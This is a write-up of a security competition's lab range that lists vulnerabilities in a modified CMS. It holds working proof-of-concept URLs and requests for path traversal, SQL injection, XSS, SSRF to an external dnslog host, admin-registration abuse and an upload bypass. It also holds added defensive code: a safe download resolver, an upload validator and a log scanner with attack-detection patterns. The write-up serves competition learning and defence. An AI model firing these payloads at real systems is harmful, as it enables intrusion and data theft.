Background

Entered the competition just for fun; didn't expect the result to be decent. Still pretty green at this.

The range part was about submitting vulnerabilities, scored per finding; the live-network attack/defense part is basically HW. Here I'm recording the range vulnerabilities. Pretty basic stuff. The competition didn't block internet access either, so whenever a question came up I just searched it.

Directory listing

Found it straight from the scan. Everything in there can be viewed, but nothing is of any use.


Arbitrary file download

Focus on mdownload.php.bak: an obvious arbitrary file read.

<?php

function MuDownloadFile($baseDir, $fileName) {
    // Build the file path
    $filePath = realpath($baseDir . '/' . $fileName);

    // Check that the file is under the given directory, to prevent directory traversal
    // (this guard is commented out in the shipped file, which is the bug)
    /*if (strpos($filePath, realpath($baseDir)) !== 0) {
        die("非法文件路径!");
    }*/

    // Check that the file exists
    if (!file_exists($filePath)) {
        die("文件不存在!");
    }

    // Set response headers
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($filePath) . '"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filePath));

    // Flush the buffer and output the file contents
    ob_clean();
    flush();
    readfile($filePath);
    exit;
}

// Example usage
$baseDir = $_SERVER['DOCUMENT_ROOT'] . '/upload/';
//echo $baseDir;
$fileName = $_GET["muxfile"];
if($fileName){
    MuDownloadFile($baseDir, $fileName);
}
?>

robots.txt contents are below. qgqgxzxzx is the admin backend path, and it even helpfully gives away the file-download entry point index.php?r=mdownload.

User-agent: *
Disallow: /index.php?r=pages&did=1
Disallow: /files
Disallow: /uploads
Disallow: /qgqgxzxzx
Disallow: /index.php?r=mdownload

PoC:

http://192.168.157.184/index.php?r=mdownload&muxfile=../index.php
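The commented-out guard in mdownload.php.bak has a second weakness even when enabled: realpath() strips the trailing slash, so a plain prefix comparison against /upload would also accept /upload_old/.... The following is an added example (my code, not the range's) of how the download path should be resolved: accept only a bare file name, resolve symlinks, and compare the resolved path by path component. The directory layout in demo() is constructed for the test.

```python
import os
import tempfile


def resolve_download(base_dir: str, file_name: str):
    """Return the real path of file_name inside base_dir, or None if it must be refused."""
    base = os.path.realpath(base_dir)
    # Accept only a bare file name: no separators, no parent references, no NUL bytes.
    if not file_name or "\x00" in file_name or file_name in (".", ".."):
        return None
    if os.path.basename(file_name) != file_name:
        return None
    # realpath also follows symlinks, so a link inside upload/ pointing outside is caught below.
    full = os.path.realpath(os.path.join(base, file_name))
    # Component-wise containment check: /upload does not match /upload_old/x here.
    if os.path.commonpath([base, full]) != base:
        return None
    if not os.path.isfile(full):
        return None
    return full


def demo():
    """Constructed layout: upload/report.pdf (legit), ../index.php (outside), upload/link.pdf -> ../index.php."""
    root = tempfile.mkdtemp()
    upload = os.path.join(root, "upload")
    os.mkdir(upload)
    with open(os.path.join(upload, "report.pdf"), "w") as f:
        f.write("pdf")
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php")
    try:
        os.symlink(os.path.join(root, "index.php"), os.path.join(upload, "link.pdf"))
    except OSError:
        pass  # platforms without symlink support simply skip that case
    return {
        "report.pdf": resolve_download(upload, "report.pdf") is not None,
        "../index.php": resolve_download(upload, "../index.php") is not None,
        "link.pdf": resolve_download(upload, "link.pdf") is not None,
        "missing.pdf": resolve_download(upload, "missing.pdf") is not None,
    }


if __name__ == "__main__":
    print(demo())
```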

SQL injection 1

In the list on the homepage:

http://192.168.157.184/index.php?r=list&class=221'union select 1,2,version(),4,5,6,7,8,9--+

The normal approach would be to read the account and password and get into the backend, but keywords are banned here.


This range is a modified (secondary-developed) version, but the basic structure is unchanged. Download the source from the net, follow the structure to the file behind the list feature, and you can see the filtering rules.

Couldn't bypass it. Too noob.


SQL injection 2

PoC:

http://192.168.157.184/?r=downloads&type=soft&line=pan&cid=1'and/**/sleep(6)--+


Admin account registration

Endpoint:

http://192.168.157.184/qgqgxzxzx/?r=register


Registration returns a sid.


The backend lets you activate the admin here; after activation, logging in drops you straight into the backend.

http://192.168.157.184/qgqgxzxzx/?r=activation&sid=2


Getshell

Every image upload point is restricted and nothing gets through; the file management feature is where you can get a shell.


Entry point:

http://192.168.157.184/qgqgxzxzx/?r=fileupload

But no upload form is provided, so you have to build the request yourself. Looking at the backend code, it reads the `file` field, only checks the MIME type, and requires the extension not to be php; a simple case variation gets past that.


Uploading gave the error Incorrect integer value: ‘’ for column ‘img_kg’ at row 1

Following https://blog.csdn.net/sifeimeng/article/details/84740808, modify the config file:

sql-mode="STRICT_TRANS_TABLES,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION",

After that change the entry point still wouldn't accept the upload; it's a PHP version issue. 5.4.45 worked for me.
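The upload check described above fails because it is a case-sensitive denylist on the last extension plus a client-controlled MIME header. As an added example (my code, not the range's), weak_check is a constructed approximation of that logic and strong_check is the shape a defender wants: case-fold the name, allow-list every extension segment, tie the declared MIME type to the file's magic bytes, and pick the stored name server-side. The ALLOWED policy table is my own assumption.

```python
import os
import secrets

# Hypothetical policy for an image-upload endpoint: extension -> (expected MIME, magic bytes).
ALLOWED = {
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "gif":  ("image/gif",  b"GIF8"),
}


def weak_check(file_name: str, mime: str) -> bool:
    """Constructed approximation of the check the writeup describes: MIME header plus 'extension != php'."""
    ext = file_name.rsplit(".", 1)[-1]
    return mime.startswith("image/") and ext != "php"


def strong_check(file_name: str, mime: str, head: bytes):
    """Return a server-chosen stored name for an acceptable upload, or None to reject it.

    head is the first bytes of the uploaded content (read server-side, not taken from the client).
    """
    name = os.path.basename(file_name.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or any(p == "" for p in parts):
        return None
    # Every segment after the base name must be an allowed extension. This rejects
    # shell.PHP and shell.php.jpg alike; legitimate multi-dot names like my.photo.jpg
    # are rejected too, which is an accepted trade-off for an image endpoint.
    exts = parts[1:]
    if any(e not in ALLOWED for e in exts):
        return None
    expected_mime, magic = ALLOWED[exts[-1]]
    # The client-supplied MIME type must agree with both the extension and the actual bytes.
    if mime != expected_mime or not head.startswith(magic):
        return None
    # Never store under the user-supplied name; a random name kills every naming trick.
    return f"{secrets.token_hex(8)}.{exts[-1]}"
```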


Reflected XSS 1

http://127.0.0.1/?r=contact&page=<script>alert(77)</script>22

Reflected XSS 2

http://127.0.0.1/?r=content&cid="/><script>alert(77)</script>

Reflected XSS 3

http://127.0.0.1/?r=download&page=<script>alert(77)</script>

Reflected XSS 4

http://127.0.0.1/?r=list&page=<script>alert(77)</script>

Reflected XSS 5

http://127.0.0.1/?r=software&cid="/><script>alert(77)</script>

Reflected XSS 6

The cookie can be XSSed here too, but it's not very useful.


http://127.0.0.1/?r=content

cookie:name=" /><script>alert(77)</script>

Backend reflected XSS 1

http://127.0.0.1/qgqgxzxzx/?r=columnlist&delete=')</script><script>alert(77)</script>

Backend reflected XSS 2

http://127.0.0.1/qgqgxzxzx/?r=columnlist&delete2=')</script><script>alert(77)</script>

Backend reflected XSS 3

http://127.0.0.1/qgqgxzxzx/?r=commentlist&delete=')</script><script>alert(77)</script>

Backend reflected XSS 4

http://127.0.0.1/qgqgxzxzx/?r=commentlist&page=<script>alert(77)</script>

Backend reflected XSS 5

http://192.168.157.184/qgqgxzxzx/?r=softlist&page=<script>alert(77)</script>

Backend reflected XSS 6

http://192.168.157.184/qgqgxzxzx/?r=wzlist&page=<script>alert(77)</script>

Backend reflected XSS 7

http://192.168.157.184/qgqgxzxzx/?r=softlist&delete=</script><script>alert(77)</script>

Backend injection 1

POST /qgqgxzxzx/?r=editcolumn&type=1 HTTP/1.1
Host: 192.168.157.184
Content-Length: 760
Cache-Control: max-age=0
Origin: http://192.168.157.184
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.157.184/qgqgxzxzx/?r=editcolumn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bqoabevo7ibfncf5jasee4evi3; user=admin
Connection: close

------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="name"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="link"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="keywords"

00
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="description"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="content"

2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--'
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="xs"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="save"

1
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP--

Backend injection 2

POST /qgqgxzxzx/?r=editcolumn&type=2 HTTP/1.1
Host: 192.168.157.184
Content-Length: 760
Cache-Control: max-age=0
Origin: http://192.168.157.184
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.157.184/qgqgxzxzx/?r=editcolumn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: CSRF_TOKEN=2vakvByF5GcQrwsj; kodUserID=1; PHPSESSID=bqoabevo7ibfncf5jasee4evi3; user=admin
Connection: close

------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="name"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="link"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="keywords"

00
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="description"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="tuijian"

2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--'
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="xs"

0
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP
Content-Disposition: form-data; name="save"

1
------WebKitFormBoundaryQ1hCkOYTK7ZRKiMP--

Backend injection 3

http://192.168.157.184/qgqgxzxzx/?r=reply&type=2&id=2'and updatexml(1,concat(0x7e,(select version()),0x7e),1)--+

SSRF 1

http://192.168.157.184/qgqgxzxzx/?r=update&url=dict://127.0.0.1:3306

SSRF 2

The editor here is actually ueditor, just renamed, so ueditor's known vulnerabilities can be used directly. Didn't bother testing the rest.

http://192.168.157.184/seacmseditor/php/controller.php?action=catchimage&source[]=http://exp.otyzb0.dnslog.cn
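From the defender's side, every GET payload in this writeup leaves a recognisable trace in the web server access log. The following is an added example (my code, not the range's) of a small log scanner for exactly those patterns: it URL-decodes the request target, strips the inline /**/ comments used to dodge keyword filters, and tags each line. The log lines are constructed in combined log format from the requests shown above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines modelled on the PoCs in this writeup (not real captures).
SAMPLE_LOG = """\
10.0.0.5 - - [26/Nov/2024:18:05:54 +0800] "GET /index.php?r=mdownload&muxfile=../index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2024:18:06:10 +0800] "GET /index.php?r=list&class=221'union%20select%201,2,version(),4,5,6,7,8,9--+ HTTP/1.1" 200 9281 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2024:19:57:42 +0800] "GET /?r=downloads&type=soft&line=pan&cid=1'and/**/sleep(6)--+ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [26/Nov/2024:20:02:10 +0800] "GET /qgqgxzxzx/?r=register HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2024:20:13:11 +0800] "GET /?r=contact&page=%3Cscript%3Ealert(77)%3C/script%3E22 HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2024:20:18:30 +0800] "GET /qgqgxzxzx/?r=reply&type=2&id=2'and%20updatexml(1,concat(0x7e,(select%20version()),0x7e),1)--+ HTTP/1.1" 500 210 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Nov/2024:20:20:05 +0800] "GET /qgqgxzxzx/?r=update&url=dict://127.0.0.1:3306 HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Nov/2024:20:21:00 +0800] "GET /index.php?r=list&class=221 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Rule name -> pattern applied to the normalised request target.
RULES = [
    ("path-traversal", re.compile(r"\.\.[/\\]")),
    ("sqli-union",     re.compile(r"['\"]\s*union\s+select", re.I)),
    ("sqli-time",      re.compile(r"\bsleep\s*\(", re.I)),
    ("sqli-error",     re.compile(r"\bupdatexml\s*\(", re.I)),
    ("xss-reflected",  re.compile(r"<\s*script\b", re.I)),
    ("ssrf-scheme",    re.compile(r"=\s*(dict|gopher|file)://", re.I)),
]

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(target: str) -> str:
    """Decode twice (catches double-encoding) and blank out inline SQL comments."""
    decoded = unquote_plus(unquote_plus(target))
    return re.sub(r"/\*.*?\*/", " ", decoded)


def scan(log_text: str):
    """Return (client ip, raw target, [matching rule names]) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tags = [name for name, rx in RULES if rx.search(normalize(m.group("target")))]
        if tags:
            hits.append((m.group("ip"), m.group("target"), tags))
    return hits
```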

Then it's just the usual bug hunting: robots.txt leaks the backend path, absolute path disclosure, the registration page allows user enumeration, and the backend operations have a pile of CSRF.

These all count as vulnerabilities.